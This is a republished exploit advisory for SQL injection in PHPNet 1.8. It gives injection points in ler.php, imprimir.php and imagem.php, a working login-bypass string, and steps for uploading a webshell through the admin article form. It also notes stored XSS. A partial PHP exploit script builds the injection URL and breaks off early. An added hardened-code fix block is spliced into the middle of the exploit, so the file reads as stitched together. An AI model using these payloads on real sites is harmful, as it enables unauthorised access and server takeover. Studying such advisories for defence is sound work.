PHPNet <= 1.8 (ler.php) SQL injection and fix - vulnerability warning - the black bar safety net

ID MYHACK58:62201234102
Type myhack58
Reporter Anonymous
Modified 2012-06-13T00:00:00


<?php

Title: PHPNet <= 1.8 (ler.php) SQL Injection

Author: WhiteCollarGroup


Download address:

Affected version: 1.8

Test platform: Debian GNU/Linux,Windows 7 Ultimate


In this system we discovered multiple SQL injection vulnerabilities.

~> SQL Injection

This exploit targets the vulnerability in ler.php, but the same vulnerability is present in imprimir.php and imagem.php.

ler.php?id=[SQLi]

imprimir.php?id=[SQLi]

imagem.php?id=[SQLi]


php file.php /path/

~> Login bypass

On the login page, authentication can be bypassed using the following SQLi strings.

Go to http:// /path/admin/login.php

Login: 'or 1=1-- wc

Pass: wcgroup

~> arbitrary file upload

After opening the administration panel, add a new article.

Use the upload form to upload your webshell.

After posting, access:


~> information disclosure



~> XSS Stored (persistent)

When posting a new article, (D)HTML/JavaScript code can be placed in the article body, and it is stored and rendered on the page.
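As an added example that is not part of the original advisory and not PHPNet's own code, the following PHP shows the hardened form of each pattern the advisory describes: integer validation plus a bound parameter for the id used by ler.php, imprimir.php and imagem.php; a bound login and password_verify() for admin/login.php, so a login string such as `' or 1=1--` is just a literal value; content-based type checks and a server-chosen file name for the article upload form; and output encoding at render time against the stored XSS. The DSN, credentials, table and column names (artigos, usuarios, senha_hash, titulo, texto) are assumptions; PHPNet's real schema is not on the page.

```php
<?php
// Added example (not PHPNet's code): hardened versions of the patterns the
// advisory describes. Schema names below are assumptions.
declare(strict_types=1);

function db(): PDO {
    $pdo = new PDO('mysql:host=localhost;dbname=phpnet;charset=utf8mb4', 'phpnet', 'secret');
    // No client-side emulation: placeholders become real server-side parameters.
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    return $pdo;
}

// ler.php / imprimir.php / imagem.php: the vulnerable pattern is
//   $q = "SELECT * FROM artigos WHERE id=" . $_GET['id'];
// Hardened: validate the type first, then bind the value.
function loadArticle(PDO $pdo, mixed $rawId): ?array {
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;  // "-0'" and similar never reach the SQL engine
    }
    $st = $pdo->prepare('SELECT id, titulo, texto FROM artigos WHERE id = :id');
    $st->execute([':id' => $id]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// admin/login.php: "' or 1=1--" only works when the login string is spliced into
// the query. Bind the login and compare the password in PHP, never in SQL.
function authenticate(PDO $pdo, string $login, string $password): bool {
    $st = $pdo->prepare('SELECT senha_hash FROM usuarios WHERE login = :login');
    $st->execute([':login' => $login]);
    $hash = $st->fetchColumn();
    // Unknown users still pay for one verify against a dummy hash, so response
    // time does not reveal which logins exist.
    $dummy = password_hash('dummy-password', PASSWORD_DEFAULT);
    $ok = password_verify($password, $hash === false ? $dummy : $hash);
    return $ok && $hash !== false;
}

// Article upload form: decide the type from the content, not from the
// client-supplied name, and store under a name the server chooses.
function storeUpload(array $file, string $dir): ?string {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $allowed = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($allowed[$mime]) || getimagesize($file['tmp_name']) === false) {
        return null;  // a script renamed to .jpg fails both checks
    }
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($dir, '/') . '/' . $name;
    return move_uploaded_file($file['tmp_name'], $dest) ? $name : null;
}

// Stored XSS: encode on output, exactly where article text meets HTML.
function renderArticle(array $article): string {
    $e = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<h1>' . $e($article['titulo']) . '</h1>'
         . '<div>' . nl2br($e($article['texto'])) . '</div>';
}

// Usage inside ler.php (assumed entry point):
$article = loadArticle(db(), $_GET['id'] ?? null);
if ($article === null) {
    http_response_code(404);
    exit('Article not found');
}
echo renderArticle($article);
```

The upload directory should additionally be served from a location where the web server does not execute PHP at all, so that a file which slips past the content checks is delivered as static data rather than run.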


function _printf($str) {
    echo $str."\n";
}

function hex($string){
    $hex=""; // PHP 'Dim' =]
    for ($i=0; $i < strlen($string); $i++){
        $hex .= dechex(ord($string[$i]));
    }
    return '0x'.$hex;
}

// Note: E_ERROR & E_USER_WARNING is a bitwise AND and evaluates to 0,
// so this call switches all error reporting off.
error_reporting(E_ERROR & E_USER_WARNING);
@ini_set('default_socket_timeout', 30);

echo "\n";
echo "PHPNet <= 1.8 SQLi Exploit\n";
echo "Discovered by WhiteCollarGroup\n";
echo " -";

if($argc != 2) {
    _printf("php $argv[0] <target>");
    _printf("php $argv[0] http:// /path/");
    exit(1); // usage printed, nothing else to do
}

$target = $argv[1];
if(substr($target, (strlen($target)-1)) != "/") { // if the last character is not a slash
    $target .= "/";
}

$inject = $target . "ler.php?id=-0'%20";
$token = uniqid();
$token_hex = hex($token);

// now fetch the following data: user() version()
echo "\n\n[*] Trying to get informations...\n";
